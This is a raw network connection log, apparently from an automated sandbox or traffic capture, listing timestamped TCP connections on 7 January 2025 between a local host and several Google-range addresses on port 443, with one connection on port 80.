                                                                                                                    Jan 7, 2025 13:18:30.032217979 CET44349756142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.032345057 CET44349756142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.032816887 CET49756443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:30.050380945 CET49756443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:30.050416946 CET44349756142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.059272051 CET49772443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:30.059298992 CET44349772142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.059509039 CET49772443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:30.060652018 CET49772443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:30.060678005 CET44349772142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.508974075 CET44349768142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.509033918 CET49768443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:30.509633064 CET49768443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:30.509639025 CET44349768142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.512547970 CET49768443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:30.512553930 CET44349768142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.524086952 CET44349769142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.524180889 CET49769443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:30.524606943 CET49769443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:30.524617910 CET44349769142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.527062893 CET49769443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:30.527077913 CET44349769142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.662370920 CET44349771142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.662437916 CET49771443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:30.662856102 CET49771443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:30.662862062 CET44349771142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.663120985 CET49771443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:30.663132906 CET44349771142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.697844028 CET44349772142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.697906971 CET49772443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:30.698491096 CET49772443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:30.698512077 CET44349772142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.698678017 CET49772443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:30.698684931 CET44349772142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.904220104 CET44349768142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.904285908 CET49768443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:30.904294968 CET44349768142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.904339075 CET49768443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:30.904548883 CET49768443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:30.904582977 CET44349768142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.904630899 CET49768443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:30.905184984 CET49780443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:30.905209064 CET44349780142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.905275106 CET49780443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:30.905448914 CET49780443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:30.905459881 CET44349780142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.922741890 CET44349769142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.922811031 CET49769443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:30.922826052 CET44349769142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.922863007 CET49769443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:30.923060894 CET49769443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:30.923111916 CET44349769142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.923197031 CET49769443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:30.923643112 CET49781443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:30.923671961 CET44349781142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.923737049 CET49781443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:30.923998117 CET49781443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:30.924021006 CET44349781142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.207685947 CET44349772142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.207726955 CET44349772142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.207760096 CET49772443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:31.207771063 CET44349772142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.207830906 CET44349772142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.207885027 CET49772443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:31.208117008 CET49772443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:31.209347010 CET49782443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:31.209374905 CET44349782142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.209388971 CET49772443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:31.209400892 CET44349772142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.209697962 CET49782443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:31.210129976 CET49782443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:31.210140944 CET44349782142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.212759018 CET44349771142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.212795019 CET44349771142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.212910891 CET44349771142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.212913990 CET49771443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:31.213057041 CET49771443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:31.213632107 CET49771443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:31.213646889 CET44349771142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.214258909 CET49784443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:31.214288950 CET44349784142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.214652061 CET49784443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:31.214652061 CET49784443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:31.214682102 CET44349784142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.554946899 CET44349780142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.555433035 CET49780443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:31.555784941 CET44349780142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.556176901 CET49780443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:31.557493925 CET44349781142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.558398008 CET44349781142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.558470964 CET49781443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:31.558505058 CET44349781142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.081825018 CET49818443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:35.081835032 CET44349818142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.082700968 CET49828443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:35.082740068 CET44349828142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.082798004 CET49828443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:35.089560986 CET49828443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:35.089579105 CET44349828142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.116790056 CET44349820142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.116843939 CET49820443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:35.116852999 CET44349820142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.116904020 CET49820443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:35.120588064 CET49820443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:35.120599031 CET44349820142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.123995066 CET49829443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:35.124027967 CET44349829142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.124268055 CET49829443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:35.128737926 CET49829443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:35.128752947 CET44349829142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.142724991 CET44349821142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.142771006 CET44349821142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.142781973 CET49821443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:35.142793894 CET44349821142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.142813921 CET49821443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:35.142853975 CET49821443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:35.142858982 CET44349821142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.142868042 CET44349821142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.142935038 CET49821443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:35.143980026 CET49821443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:35.143987894 CET44349821142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.144694090 CET49830443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:35.144728899 CET44349830142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.144903898 CET49830443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:35.145339966 CET49830443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:35.145354986 CET44349830142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.150571108 CET44349819142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.150621891 CET49819443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:35.150631905 CET44349819142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.150644064 CET44349819142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.150672913 CET49819443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:35.150705099 CET49819443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:35.150712013 CET44349819142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.150764942 CET49819443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:35.150765896 CET44349819142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.154181957 CET49819443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:35.169692039 CET49819443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:35.169711113 CET44349819142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.170326948 CET49831443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:35.170368910 CET44349831142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.170433044 CET49831443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:35.170928955 CET49831443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:35.170942068 CET44349831142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.718436003 CET44349828142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.718549967 CET49828443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:35.719274998 CET49828443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:35.719283104 CET44349828142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.721276999 CET49828443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:35.721285105 CET44349828142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.765273094 CET44349829142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.765330076 CET49829443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:35.765644073 CET49829443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:35.765650034 CET44349829142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.765836000 CET49829443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:35.765840054 CET44349829142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.793395042 CET44349830142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.793482065 CET49830443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:35.796544075 CET49830443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:35.796561956 CET44349830142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.796776056 CET49830443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:35.796781063 CET44349830142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.814271927 CET44349831142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.814546108 CET49831443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:35.815170050 CET49831443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:35.815177917 CET44349831142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.815344095 CET49831443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:35.815347910 CET44349831142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:36.130290985 CET44349828142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:36.130357981 CET49828443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:36.130382061 CET44349828142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:36.130889893 CET49828443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:36.130970955 CET49828443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:36.131017923 CET44349828142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:36.131117105 CET49828443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:36.131572008 CET49840443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:36.131613970 CET44349840142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:36.131668091 CET49840443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:36.131998062 CET49840443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:36.132013083 CET44349840142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:36.170404911 CET44349829142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:36.170466900 CET49829443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:36.170478106 CET44349829142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:36.170681000 CET49829443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:36.170759916 CET49829443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:36.170794010 CET44349829142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:36.170924902 CET44349829142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:36.170974016 CET49829443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:36.170993090 CET49829443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:36.171365976 CET49841443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:36.171401978 CET44349841142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:36.171493053 CET49841443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:36.171696901 CET49841443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:36.171708107 CET44349841142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:36.304730892 CET44349831142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:36.304801941 CET44349831142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:36.304841995 CET49831443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:36.304860115 CET44349831142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:36.304878950 CET49831443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:36.304943085 CET44349831142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:36.304971933 CET49831443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:36.304981947 CET49831443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:36.305882931 CET49831443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:36.305893898 CET44349831142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:36.307121992 CET49842443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:36.307161093 CET44349842142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:36.307218075 CET49842443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:36.307493925 CET49842443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:36.307507992 CET44349842142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:36.313656092 CET44349830142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:36.313698053 CET44349830142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:36.313771009 CET49830443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:36.313782930 CET44349830142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:36.313795090 CET49830443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:36.313796997 CET44349830142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:36.313879013 CET49830443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:36.316792965 CET49830443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:36.316827059 CET44349830142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:36.317295074 CET49843443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:36.317315102 CET44349843142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:36.317404985 CET49843443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:36.317826986 CET49843443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:36.317837000 CET44349843142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:36.789386034 CET44349840142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:36.789468050 CET49840443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:36.790139914 CET44349840142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:36.790189028 CET49840443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:36.792453051 CET49840443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:36.792462111 CET44349840142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:36.792692900 CET44349840142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:36.792735100 CET49840443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:36.793091059 CET49840443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:36.809273958 CET44349841142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:36.809345961 CET49841443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:36.810055971 CET44349841142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:36.810106039 CET49841443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:36.826960087 CET49841443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:36.826975107 CET44349841142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:36.827255011 CET44349841142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:36.827302933 CET49841443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:36.827714920 CET49841443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:36.839329004 CET44349840142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:36.875324011 CET44349841142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:36.934679031 CET44349842142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:39.723197937 CET44349862142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:39.723261118 CET44349862142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:39.723275900 CET49862443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:39.723305941 CET44349862142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:39.723335981 CET49862443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:39.723407030 CET49862443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:39.723411083 CET44349862142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:39.723453045 CET44349862142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:39.723498106 CET49862443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:39.724065065 CET49862443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:39.724080086 CET44349862142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:39.724587917 CET49878443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:39.724652052 CET44349878142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:39.724706888 CET49878443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:39.724956036 CET49878443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:39.724972963 CET44349878142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:39.877137899 CET44349865142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:39.877183914 CET44349865142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:39.877235889 CET49865443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:39.877263069 CET44349865142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:39.877363920 CET49865443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:39.878189087 CET44349865142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:39.878233910 CET44349865142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:39.878242970 CET49865443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:39.878273010 CET49865443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:40.343178034 CET44349876142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:40.343271017 CET49876443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:40.343975067 CET44349876142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:40.344023943 CET49876443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:40.352684021 CET44349878142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:40.352802992 CET49878443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:40.358230114 CET44349877142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:40.358314991 CET49877443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:40.359006882 CET44349877142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:40.359055996 CET49877443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:46.746095896 CET49878443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:46.746123075 CET44349878142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:46.749432087 CET49877443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:46.749444962 CET44349877142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:46.749728918 CET44349877142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:46.749816895 CET49877443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:46.749882936 CET49878443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:46.749892950 CET44349878142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:46.750322104 CET49876443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:46.750339031 CET49877443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:46.750349998 CET44349876142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:46.750720978 CET44349876142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:46.750765085 CET49876443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:46.791338921 CET44349877142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:47.067473888 CET44349877142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:47.067687035 CET49877443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:47.068718910 CET44349877142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:47.068758965 CET44349877142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:47.068766117 CET49877443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:47.068798065 CET49877443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:47.087347031 CET44349878142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:47.087399006 CET44349878142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:47.087408066 CET49878443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:47.087423086 CET44349878142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:47.087443113 CET49878443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:47.087480068 CET49878443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:47.087486982 CET44349878142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:47.087729931 CET49878443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:47.918863058 CET4975380192.168.2.1169.42.215.252
                                                                                                                    Jan 7, 2025 13:18:47.918939114 CET49877443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:47.919449091 CET49876443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:47.919483900 CET49865443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:47.919539928 CET49878443192.168.2.11142.250.186.161
Timestamp | Source Port | Dest Port | Source IP | Dest IP
